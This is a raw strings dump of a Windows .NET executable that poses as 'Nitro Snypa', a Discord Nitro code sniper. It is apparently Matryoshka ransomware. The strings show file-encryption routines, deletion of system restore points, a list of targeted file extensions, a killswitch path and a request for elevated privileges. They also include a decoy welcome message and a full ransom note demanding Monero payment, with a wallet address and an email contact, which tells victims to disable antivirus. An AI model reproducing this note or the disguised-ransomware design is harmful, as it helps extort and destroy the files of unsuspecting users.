!This program cannot be run in DOS mode.
`.rsrc
@.reloc
b Ks`
b 0s`
r $sc
0 0 0(
v4.0.30319
#Strings
<>9__5_0
<Matryoshka_Load>b__5_0
IEnumerable`1
Microsoft.Win32
UInt32
get_UTF8
<Module>
lbl_GUID
SetDeviceID
System.IO
lbl_ReadRU
get_IV
set_IV
pb_Matryoshka
lbl_Matryoshka
pnl_Matryoshka
get_Matryoshka
NitroSnypa
FromArgb
mscorlib
System.Collections.Generic
lbl_Read
Thread
Matryoshka_Load
add_Load
get_Red
add_TextChanged
txt_Wallet_TextChanged
add_SelectedIndexChanged
cb_Lang_SelectedIndexChanged
set_Enabled
set_FormattingEnabled
NewGuid
<IV>k__BackingField
<Key>k__BackingField
Clipboard
set_Mode
set_AutoScaleMode
set_SizeMode
PictureBoxSizeMode
PaddingMode
CipherMode
Decode
bytesToEncode
set_Image
set_InitialImage
AddRange
Enumerable
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
EncryptFile
set_BorderStyle
set_FormBorderStyle
set_FlatStyle
FontStyle
set_Name
DateTime
Combine
LocalMachine
System.Core
get_Culture
set_Culture
resourceCulture
get_InvariantCulture
ButtonBase
TextBoxBase
Dispose
EditorBrowsableState
get_White
STAThreadAttribute
CompilerGeneratedAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
AssemblyTitleAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyInformationalVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
GetValue
SetValue
NitroSnypa.exe
set_Size
set_BlockSize
set_MinimumSize
set_AutoSize
set_ClientSize
set_KeySize
ISupportInitialize
cb_Lang
System.Threading
set_Padding
Encoding
System.Runtime.Versioning
ToString
GetString
disposing
System.Drawing
GetFolderPath
get_Length
length
RegistryKeyPermissionCheck
add_Tick
TTimer_Tick
add_Click
btn_CopyWallet_Click
TransformFinalBlock
set_Interval
lbl_GuidLbl
System.ComponentModel
Srclient.dll
ContainerControl
ListControl
Program
get_Item
System
SymmetricAlgorithm
Random
btn_Confirm
ICryptoTransform
get_MsgEn
resourceMan
TimeSpan
set_TextAlign
set_Icon
set_ShowIcon
GetExtension
Application
get_Location
set_Location
location
System.Globalization
System.Reflection
ControlCollection
ManagementObjectCollection
Exception
Button
lbl_SendTo
wb_HowTo
CultureInfo
pb_Monero
get_Monero
get_Tomato
Bitmap
set_TabStop
System.Linq
Crypt0r
set_DisplayMember
AesCryptoServiceProvider
IFormatProvider
SpecialFolder
sender
get_ResourceManager
ComponentResourceManager
EventHandler
System.CodeDom.Compiler
TTimer
lbl_Timer
IContainer
get_NitroSniper
WebBrowser
set_ForeColor
set_BackColor
set_UseVisualStyleBackColor
ManagementObjectEnumerator
GetEnumerator
.cctor
Cryptor
CreateDecryptor
CreateEncryptor
GenStr
System.Diagnostics
get_Seconds
System.Runtime.CompilerServices
GetInstances
System.Resources
Matryoshka.Matryoshka.resources
Matryoshka.Properties.Resources.resources
DebuggingModes
GetDirectories
Matryoshka.Properties
EncFiles
GetFiles
EnableVisualStyles
GetSubKeyNames
get_Minutes
encryptedBytes
ReadAllBytes
WriteAllBytes
GetBytes
EventArgs
get_Controls
get_Items
System.Windows.Forms
Contains
set_AutoScaleDimensions
ObjectGetOptions
get_Chars
get_Hours
ManagementClass
components
DelRestPoints
Exists
get_Days
Concat
Subtract
ParseExact
ManagementBaseObject
GetObject
lbl_Wallet
txt_Wallet
btn_CopyWallet
lbl_TimeLeft
EndInit
BeginInit
SetCompatibleTextRenderingDefault
DialogResult
System.Management
HorizontalAlignment
ContentAlignment
Environment
pnl_Payment
InitializeComponent
get_Current
SRRemoveRestorePoint
set_Font
GetPathRoot
ThreadStart
Convert
SuspendLayout
ResumeLayout
PerformLayout
MoveNext
System.Text
get_Text
set_Text
SetText
set_DocumentText
get_MsgRu
get_Now
set_TabIndex
get_SelectedIndex
MessageBox
PictureBox
set_MaximizeBox
ComboBox
TextBox
txt_WalletPay
get_Key
set_Key
CreateSubKey
OpenSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
GetEntryAssembly
set_ReadOnly
EncryptDirectory
Registry
WrapNonExceptionThrows
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
Release
Discord Nitro Sniper
5.32.0.0
Nitro Snypa
NitroSnypa
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aBj
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7 pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{? a!S
uBgS\]
SBH~,y
S"d0KV:
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3afSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADP
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
IDATx^
lr%uuu
h`(Ic*
Sz&Oz6O
W^})<d(
+=O#:T
QzFN:L
c-=/%z
>GT^y)
0gk}w<
VYEC,I
V9EC+I
4lO=~
vW#/z/
R+ECLI
i~ECTI
mV%m=W
c%-'W}H
hs*iyE
Rn}Uwc~
3%Ic(o
^?Z^~V
_[_+D?3RI]
v}?v%o
S/}?\wH
ECjiQE
/Z(K%t
c[-XPp
?7?$ikE
0/)w/F
/7@Ts)/
8y<<XP]E
j(:TP=E
}-?7@Tk;v-v
}-?7@Tk)/
1/Co#7@
VxX-mw
CjiY}x
Qt8--;
jmxVvt
~c2:HP
_tH--+
jhxtDt
Vtx-]k
BtEE_+s+
CLm,7A
W4,K5v
|mW^t=
L4@K57
S4kHS(
D4HKS(:
\M4TKS
P8OHS)
Q4XKSi8
-M-/Co
lV4dKS
FQ4hKSk8
q4xKS.:
Bim}wY
Zhx\Ft
vKyq_4
)IQ^|>
(:XU]E
X5~c rG
I[kxN{t
I[oxn{t
R^?PV
?G$][)wo
F?7$]{)w
~ax%Z$$-/7A$
Ton~Hu
[3<W7Z8$
E$ZP$M
A$]K'N
Zw$Zl$
0-)wOE
!Z|$iY
$IZM)w
^?O?VFk
-Iyq,Z
y=Z %I
~q|+Z(%I
z?ZB%I
|;ZF%I
}'ZR%I
w!Zj%I
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
twIDATx^
q<;W>}
ggM+< bY|
p_,WMY
?4mA]n{R
}"&''7
<Dre`D
foQ\eKU
.oA\eKY
B`A\eK]
j5&?)e
ok;Z>%
zttt+Kk
]-6>ii
[*_ii$A
kgL'-n
;kZ)P>gx
"vKoQ[g)
~@ n,o
-fo[ga[_
`QNd{Y
[L_jqg
;,,DD}
.?^*5
sc9ha{
:Gzw v
XL?ba{
hn%/lk[z
$/VLG,lO
|,{\`!\u)
mddd{Ke
K-lTJr
eFc:$o
f'kJ2tb
K~A&=6
"c(ViU
qN O,Nw
" '=A)
8G&''7
^600p?K
*N b</
WiN~u``
<div align="justify">
<h1>Ooops!!!</h1>
<b>You have been infected by Matryoshka Ransomware.</b>
<p>Read all instructions carefully to recover files.</p>
<h3>What is Matryoshka Ransomware?</h3>
Ransomware is a computer program that encrypts files with military grade cryptography algorithms.
This means you cannot decrypt it alone, you need creators of such virus to decrypt for you.
Matryoshka has infected you and your files are now encrypted. Good news! We <b>can decrypt</b> for you. That, however, comes with small price: <b>$75 (seventy five US dollars)</b>. Very cheap, yes? Other ransomwares charge up to $1000, we are being generous!
You are advised to pay the fee within 20 days of infection (as seen on left of window).
If demand is not met, all encrypted files are deleted <b>FOREVER</b>.
<h3>Things you must know</h3>
Only Matryoshka Team (
) can decrypt your files. Any attempt you do is futile.
<b>If you delete this program, you never recover files!!!</b>
Uninstall or stop your antivirus or it may remove Matryoshka and, by consequence,
your files. Immediately.
<h3>How to pay</h3>
You pay the fee using cryptocurrency. No worries, it is easy! We only accept
Monero for payment because is very private and your information is not leaked.
You can buy Monero on sites online, like Binance.
To buy cryptocurrency Monero (XMR), you need wallet. When buying Monero from
Binance for example it will create the wallet for you. The wallet is how we identify
your computer and unlock your files.
Go on Google to learn more of how to buy XMR (Monero).
<p>YOU MUST SEND PAYMENT TO THE WALLET BELOW:</p>
<p><b>47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4</b></p>
<h3>How are files unlocked</h3>
When you send payment, it takes a little time (around 30 minutes) to the Blockchain
to register it. You will then need to insert your wallet (is 95 characters long) in this program on the payment
field below, and press "CONFIRM". But be careful, if you specify wrong wallet, it will
be bad and you will not be able to recover your files! We have program running to check payments, when you confirm that you have sent it our server receives information and will
wait to see if payment is received.
Encryption keys are stored in our server, you do not have access. When payment is confirmed,
the program gets the key and performs decryption unlocking your precious files.
This program asks the server if payment is received every 10 minutes. If yes, then files
are recovered, decrypted, everything is fixed and this program is gone.
If you have any problem, email us at matryoshka.iosef@airmail.cc and we provide support.
<b>Only email if problem is with payment confirmation delay!</b>
</div>
)<div align="justify">
!!!</h1>
?</h3>
: <b>$75 (
)</b>.
1000
</b>.</p>
!</b>
Monero
Monero
Binance.</p>
Monero (XMR),
Monero
Binance,
Google,
XMR (Monero).</p>
<p><b>47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4</b></p>
matryoshka.iosef@airmail.cc,
</div>A
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7 pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{? a!S
uBgS\]
SBH~,y
S"d0KV:
RSDSxH
C:\Users\lucas\Desktop\Matryoshka\MatryoshkaWorker\Matryoshka\obj\Release\net40\NitroSnypa.pdb
SHA256
_CorExeMain
mscoree.dll
X&IDATx
"M@@zG
f1%Ty:
.vzfU+X
;2j`(g
X4'AmAT
%6_@e2f
^`!"/#
? 03'u
Z&<aTr
'`"-yu
Qh c@?@$K:D
S<0SVNf
1j\"T
w&z.>S
LBKdxo
XN`5Xq
k7 pz^
}ghR_
v~VCfS
yXx;>~
d1O0"f
6ZHP]r
9n[S5>
r5D' A
-0S6#M
b9DeF"aGZnh
sO?`J4
f{? a!S
uBgS\]
SBH~,y
S"d0KV:
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
SOFTWARE
Matryoshka
SOFTWARE\Matryoshka
yyyy-MM-dd HH:mm:ss
C:\MatryoshkaKillswitch.txt
.matryoshka
.config
.jsonl
.class
.pickle
.vegas
.skript
.audacity
\\.\root\default
systemrestore
sequencenumber
Copied to clipboard.
pb_Matryoshka
pnl_Matryoshka
Microsoft Sans Serif
lbl_GUID
Segoe UI
lbl_GuidLbl
(GUID):
lbl_Timer
20d 23h 59m 59s
lbl_TimeLeft
(time left):
lbl_Matryoshka
English
cb_Lang
pnl_Payment
txt_WalletPay
47NVMZew49WYxzHGQUJZARRXu38ydxCyj4iXPn69jL5xXvitL8wyq7yVpYcfNxs6M5ckDdpJdpMbP7buEqtNs1FE15wmby4
btn_CopyWallet
(Copy)
lbl_SendTo
Send payment to wallet:
btn_Confirm
(Confirm Payment)
lbl_Wallet
(Wallet):
txt_Wallet
lbl_ReadRU
lbl_Read
Read Instructions Above To Pay
pb_Monero
wb_HowTo
$this.Icon
Matryoshka.Properties.Resources
Monero
NitroSniper
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Welcome to Nitro Snypa.
The application has been attached to Discord and is now running in the background looking for Nitro codes.
You will be informed if any valid code is found as it is instantly claimed.
Nitro Snypa v5.32 beta
$this.Icon
Matryoshka
Monero
NitroSniper
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Discord Nitro Sniper
CompanyName
FileDescription
NitroSnypa
FileVersion
5.32.0.0
InternalName
NitroSnypa.exe
LegalCopyright
OriginalFilename
NitroSnypa.exe
ProductName
Nitro Snypa
ProductVersion
Assembly Version
5.32.0.0